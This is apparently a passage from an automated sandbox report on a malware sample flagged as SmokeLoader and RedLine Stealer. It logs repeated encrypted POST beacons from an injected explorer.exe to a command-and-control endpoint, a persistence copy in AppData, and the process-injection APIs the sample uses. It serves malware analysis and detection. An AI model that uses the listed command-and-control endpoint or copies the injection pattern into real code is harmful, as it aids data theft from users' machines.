Oct 13, 2024 17:05:06.197290897 CEST	214	OUT	Data Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 43 07 c9 a1 Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA .[k,vuC%jpvh{OLIo;0@BG0S?-9+_C]K.Q7-(j]Vgj6,.;
Oct 13, 2024 17:05:06.985910892 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 15:05:06 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	50046	109.175.29.39	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 17:05:10.841243029 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://wqumsknhwrx.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 323 Host: nwgrus.ru
Oct 13, 2024 17:05:10.841335058 CEST	323	OUT	Data Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 52 20 ba fa Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA .[k,vuR i_y"mWN3O4R}`K@+<FY'C ]U ,G7/00Atki^;K$
Oct 13, 2024 17:05:11.639252901 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 15:05:11 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	50047	109.175.29.39	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 17:05:15.990360975 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://uqdrqkhpcmcglann.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 140 Host: nwgrus.ru
Oct 13, 2024 17:05:15.990394115 CEST	140	OUT	Data Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 3d 0a e5 f9 Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA .[k,vu==cl/^#']p_UR>>Y`~
Oct 13, 2024 17:05:16.825057983 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 15:05:16 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.4	50048	109.175.29.39	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 17:05:21.868154049 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://qxdbxtuaolo.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 200 Host: nwgrus.ru
Oct 13, 2024 17:05:21.868169069 CEST	200	OUT	Data Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 2b 19 de bd Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA .[k,vu+z<tFlboINbA_mGU+A~O2O&r<vi^2GMb{JOR
Oct 13, 2024 17:05:23.062016010 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 15:05:22 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Oct 13, 2024 17:05:23.062119961 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 15:05:22 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.4	50049	109.175.29.39	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 17:05:27.911989927 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://nobwwkshognvggkp.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 353 Host: nwgrus.ru
Oct 13, 2024 17:05:27.911989927 CEST	353	OUT	Data Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 3b 5b bc b8 Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA .[k,vu;[DsT6:dr0y){10TdH5tGLlY/xZfnBoEY3WffBO.g=
Oct 13, 2024 17:05:28.722807884 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 15:05:28 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.4	50050	109.175.29.39	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 17:05:33.742224932 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://gafhlilcplomq.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 164 Host: nwgrus.ru
Oct 13, 2024 17:05:33.742224932 CEST	164	OUT	Data Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 22 44 f3 fb Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA .[k,vu"D=Yp@>/sM&*D[A:"1oVKE
Oct 13, 2024 17:05:34.538161993 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 15:05:34 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.4	50051	109.175.29.39	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 17:05:39.543642998 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://mwqmbajulrg.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 249 Host: nwgrus.ru
Oct 13, 2024 17:05:39.543716908 CEST	249	OUT	Data Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 24 5e d4 ed Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA .[k,vu$^tX]m=b!w-pQU*]9nY8E$u!DJI&P,+'O2W&zlcS7R"&}Uti]=9Q0&
Oct 13, 2024 17:05:40.582794905 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 15:05:40 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.4	50052	109.175.29.39	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 17:05:45.099385977 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://wtfbpeudtpjocvd.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 119 Host: nwgrus.ru
Oct 13, 2024 17:05:45.099427938 CEST	119	OUT	Data Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 5f 47 fa 99 Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA .[k,vu_Gc1V6"tB5apAf
Oct 13, 2024 17:05:45.894088030 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 15:05:45 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.4	50053	109.175.29.39	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 17:05:49.937036037 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://lkewxsecdko.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 169 Host: nwgrus.ru
Oct 13, 2024 17:05:49.937036037 CEST	169	OUT	Data Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 37 50 af 82 Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA .[k,vu7P8wtjr; P 5v%H-YUKv+#AVQ5>\|Om
Oct 13, 2024 17:05:50.726022005 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 15:05:50 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.4	50054	109.175.29.39	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 17:05:55.284992933 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://sxnddulhpoyubn.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 146 Host: nwgrus.ru
Oct 13, 2024 17:05:55.284993887 CEST	146	OUT	Data Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 30 0a a7 be Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA .[k,vu0WdzZz"7XBx/20F1WG&%
Oct 13, 2024 17:05:56.081058025 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 15:05:55 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.4	50055	109.175.29.39	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 17:06:00.384315014 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://suevwuleoceiaguq.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 128 Host: nwgrus.ru
Oct 13, 2024 17:06:00.384349108 CEST	128	OUT	Data Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 5d 3d c6 f7 Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA .[k,vu]=)AB'gtl%^&oB/
Oct 13, 2024 17:06:01.187680006 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 15:06:01 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.4	50056	109.175.29.39	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 17:06:05.963869095 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://dyetfqbcutdwehk.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 301 Host: nwgrus.ru
Oct 13, 2024 17:06:05.963869095 CEST	301	OUT	Data Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 60 52 c2 e4 Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA .[k,vu`RIHkEyT(o7G6:C3cxuFe**Sp"]Mr"#K<v<qq%N[+drmiw^&@WJv
Oct 13, 2024 17:06:06.773713112 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 15:06:06 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Target ID:	0
Start time:	11:02:02
Start date:	13/10/2024
Path:	C:\Users\user\Desktop\FyDBXJE74v.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\FyDBXJE74v.exe"
Imagebase:	0x400000
File size:	296'960 bytes
MD5 hash:	497859EED941E073A43E8291908E6494
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1827444929.0000000002C9D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1827317925.0000000002C41000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1827317925.0000000002C41000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1827175401.0000000002BD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1827175401.0000000002BD0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1827149563.0000000002BC0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	11:02:11
Start date:	13/10/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff72b770000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	11:02:28
Start date:	13/10/2024
Path:	C:\Users\user\AppData\Roaming\wsbgrgh
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\wsbgrgh
Imagebase:	0x400000
File size:	296'960 bytes
MD5 hash:	497859EED941E073A43E8291908E6494
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000005.00000002.2069915449.0000000002DE0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.2069997356.0000000002E11000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.2069997356.0000000002E11000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.2070115442.0000000002E4C000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.2069943713.0000000002DF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.2069943713.0000000002DF0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 39%, ReversingLabs Detection: 41%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	9.5%
Dynamic/Decrypted Code Coverage:	29.4%
Signature Coverage:	44.2%
Total number of Nodes:	163
Total number of Limit Nodes:	7

Executed Functions

Function 00415F50 Relevance: 45.8, APIs: 24, Strings: 2, Instructions: 288
filepipetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00416022
ReadConsoleA.KERNEL32(00000000,?,00000000,?,00000000), ref: 0041603B
FindAtomW.KERNEL32(00000000), ref: 00416042
SetConsoleMode.KERNEL32(00000000,00000000), ref: 0041604A
SearchPathW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00416062
SetDefaultCommConfigW.KERNEL32(00000000,?,00000000), ref: 00416089
MoveFileW.KERNEL32(00000000,00000000), ref: 00416091
GetVersionExW.KERNEL32(?), ref: 0041609E
DisconnectNamedPipe.KERNEL32(?), ref: 004160B1
ReadConsoleOutputW.KERNEL32(00000000,?,?,?,?), ref: 004160F6
GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 00416105
LCMapStringA.KERNEL32(00000000,00000000,004183A0,00000000,?,00000000), ref: 0041611B
GetBoundsRect.GDI32(00000000,00000000,00000000), ref: 0041612D
PulseEvent.KERNEL32(00000000), ref: 0041613D
SetCommState.KERNELBASE(00000000,00000000), ref: 00416164
GetConsoleAliasesLengthA.KERNEL32(00000000), ref: 00416195
GetStringTypeExW.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 004161A6
BuildCommDCBA.KERNEL32(00000000,00000000), ref: 004161AE
GetTimeFormatW.KERNEL32(00000000,00000000,?,004183D0,?,00000000), ref: 004161EE
GetFileAttributesW.KERNEL32(00000000), ref: 004161F5
GetConsoleAliasExesLengthA.KERNEL32 ref: 004161FB
GetBinaryType.KERNEL32(004183E0,?), ref: 0041620D

Strings

k`, xrefs: 004162C3
}$, xrefs: 004162E7

Memory Dump Source

Source File: 00000000.00000002.1825971161.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_FyDBXJE74v.jbxd

Similarity

API ID: Console$CommFile$LengthReadStringType$AliasAliasesAtomAttributesBinaryBoundsBuildCompareConfigDefaultDisconnectEventExchangeExesFindFormatInterlockedModeModuleMoveNameNamedOutputPathPipePulseRectSearchStateTimeVersion
String ID: k`$}$
API String ID: 4155975733-956986773
Opcode ID: ec1e4d95d6be3dfcdf53541fe43f6e0baff54e05d6a8dcf86ef6a62a0be8a3cf
Instruction ID: eba57e92584bb82605fa89a7ec6af6020b8b03ca4a43cd0270bfcb4f130e7ef6
Opcode Fuzzy Hash: ec1e4d95d6be3dfcdf53541fe43f6e0baff54e05d6a8dcf86ef6a62a0be8a3cf
Instruction Fuzzy Hash: 27A11471841A24EBC720DB65DC58ADF7B78EF89351F4140AAF50AA7150CB384A81CBED

Function 00401514 Relevance: 10.7, APIs: 7, Instructions: 201
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000000.00000002.1825942541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FyDBXJE74v.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
Opcode Fuzzy Hash: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69

Function 004014FE Relevance: 10.7, APIs: 7, Instructions: 180
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.1825942541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FyDBXJE74v.jbxd

Similarity

API ID: Section$CreateDuplicateObjectView
String ID:
API String ID: 1652636561-0
Opcode ID: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
Opcode Fuzzy Hash: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24

Function 00401542 Relevance: 10.7, APIs: 7, Instructions: 167
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000000.00000002.1825942541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FyDBXJE74v.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
Opcode Fuzzy Hash: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24

Function 00401549 Relevance: 10.7, APIs: 7, Instructions: 164
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000000.00000002.1825942541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FyDBXJE74v.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
Opcode Fuzzy Hash: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
